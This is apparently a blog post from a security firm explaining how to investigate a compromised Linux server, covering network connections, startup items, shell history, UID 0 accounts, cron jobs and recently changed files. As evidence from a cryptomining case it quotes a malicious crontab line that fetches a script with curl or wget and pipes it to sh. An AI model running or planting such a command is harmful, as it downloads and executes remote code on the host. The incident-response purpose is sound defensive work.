如何排查linux伺服器被入侵
很多客戶網站伺服器被入侵,被攻擊,找到我們SINE安全公司尋求技術支援與幫助,有些網站被篡改,被跳轉,首頁內容被替換,伺服器植入木馬後門,伺服器卡頓,伺服器異常網路連線,有的客戶使用的是阿里雲伺服器,經常被提醒伺服器有挖礦程式,以及網站被上傳webshell的安全提醒,包括騰訊雲提示伺服器有木馬檔案,客戶網站被攻擊的第一時間,是需要立即處理的,降損失降到最低,讓網站恢復正常的訪問,由於每個客戶找到我們SINE安全都是比較著急的,安全的處理時間也需要儘快的處理,根據我們的處理經驗,我們總結了一些伺服器被攻擊,被黑的排查辦法,專門用來檢查伺服器第一時間的安全問題,看發生在哪裡,伺服器是否被黑,是否被攻擊,那些被篡改等等。
如何排查伺服器被攻擊?
首先我們會對當前伺服器的IP,以及IP的地址,linux伺服器名稱,伺服器的版本是centos,還是redhat,伺服器的當前時間,進行收集並記錄到一個txt文件裡,接下來再執行下一步,對當前伺服器的異常網路連線以及異常的系統程式檢查,主要是透過netstat -an以及-antp命令來檢查伺服器存在哪些異常的IP連線。並對連線的IP,進行歸屬地查詢,如果是國外的IP,直接記錄當前程式的PID值,並自動將PID的所有資訊記錄,查詢PID所在的linux檔案地址,緊接著檢查當前佔用CPU大於百分之30的程式,並檢查該程式所在的資料夾。
在我們處理客戶伺服器被攻擊的時候發現很多伺服器的命令被篡改,比如正常的PS檢視程式的,查詢目錄的 cd的命令都給篡改了,讓伺服器無法正常使用命令,檢查伺服器安全造成了困擾。對伺服器的啟動項進行檢查,有些伺服器被植入木馬後門,即使重啟伺服器也還是被攻擊,木馬會自動的啟動,檢查linux的init.d的資料夾裡是否有多餘的啟動檔案,也可以檢查時間,來判斷啟動項是否有問題。
再一個要檢查的地方是伺服器的歷史命令,history很多伺服器被黑都會留下痕跡,比如SSH登入伺服器後,攻擊者對伺服器進行了操作,執行了那些惡意命令都可以透過history查詢的到,有沒有使用wget命令下載木馬,或者執行S件。檢查伺服器的所有賬號,以及當前使用並登入的管理員賬戶,tty是本地使用者登入,pst是遠端連線的使用者登入,來排查伺服器是否被黑,被攻擊,也可以檢查login.defs檔案的uid值,判斷uid的passwd來獲取最近新建的管理員賬戶。執行cat etc/passwd命令檢查是否存在異常的使用者賬戶,包括特權賬戶,UID值為0.
最重要的是檢查伺服器的定時任務,前段時間某網站客戶中了挖礦病毒,一直佔用CPU,檢視了定時任務發現每15分鐘自動執行下載命令,crontab -l */15 * * * * (curl -fsSL ||wget -q-O- )|sh 程式碼如上,自動下載並執行SH木馬檔案。定時任務刪都刪不掉,最後透過檢查系統檔案查到了木馬,並終止程式,強制刪除。有些伺服器被黑後,請立即檢查2天裡被修改的檔案,可以透過find命令去檢查所有的檔案,看是否有木馬後門檔案,如果有可以確定伺服器被黑了。
以上就是伺服器被入侵攻擊的檢查辦法,透過我們SINE安全給出的檢查步驟,挨個去檢查,就會發現出問題,最重要的是要檢查日誌,對這些日誌要仔細的檢查,哪怕一個特徵都會導致伺服器陷入被黑,被攻擊的狀態,也希望我們的分享能夠幫助到更多需要幫助的人,伺服器安全了,帶來的也是整個網際網路的安全。
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/31542418/viewspace-2647873/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 伺服器入侵應急響應排查(Linux篇)伺服器Linux
- 11個步驟完美排查Linux機器是否已經被入侵Linux
- 應急響應- Linux入侵排查Linux
- Linux伺服器被入侵後的處理過程Linux伺服器
- Linux中如何檢測系統是否被入侵Linux
- linux伺服器如何防止被黑客入侵Linux伺服器黑客
- Linux雲主機安全入侵排查步驟Linux
- 公司伺服器被入侵植入挖礦軟體,如何追查?伺服器
- 如何快速排查Linux伺服器效能問題Linux伺服器
- 6.20入侵檢測排查
- linux檢測系統是否被入侵(上)Linux
- 怎麼檢測伺服器是否被入侵伺服器
- Microsoft SQL伺服器被駭客入侵 頻寬被竊取ROSSQL伺服器
- 玄機-第一章 應急響應- Linux入侵排查Linux
- 雲伺服器遭到駭客入侵植入木馬病毒排查過程伺服器
- 如何防止網站被侵入,如何防止網站被掛馬,如何防止網站被入侵?網站
- 分享如何避免您的網站被入侵?網站
- 芭比Q,Kubernetes 叢集被入侵,伺服器變礦機伺服器
- 【知識分享】伺服器被入侵後需要怎麼操作伺服器
- 週末生產事故!一次心驚肉跳的伺服器入侵排查....伺服器
- 伺服器被入侵後的一些處理辦法伺服器
- 伺服器網路故障如何排查伺服器
- 一次Linux遭入侵,挖礦程式被隱藏案例分析Linux
- 網站伺服器被入侵後的日誌查詢與分析網站伺服器
- 記一次linux伺服器入侵應急響應Linux伺服器
- 主機被入侵分析過程
- Linux中如何排查網路?常見的網路排查指令都有哪些?Linux
- 在Linux中,如何進行系統故障排查?Linux
- 在Linux中,如何進行網路故障排查?Linux
- Apline Linux被爆有嚴重漏洞,惡意攻擊者可藉此入侵容器Linux
- Linux入侵檢測基礎Linux
- 【Ubuntu】記一次伺服器被礦工光顧的排查過程Ubuntu伺服器
- 如何排查Web伺服器HTTP ERROR 500的錯誤?Web伺服器HTTPError
- 主機被入侵分析過程報告
- 排查伺服器異常伺服器
- Linux 埠排查小結Linux
- Linux排查JVM問題LinuxJVM
- 道路千萬條,安全第一條——一次伺服器被入侵的處理經過伺服器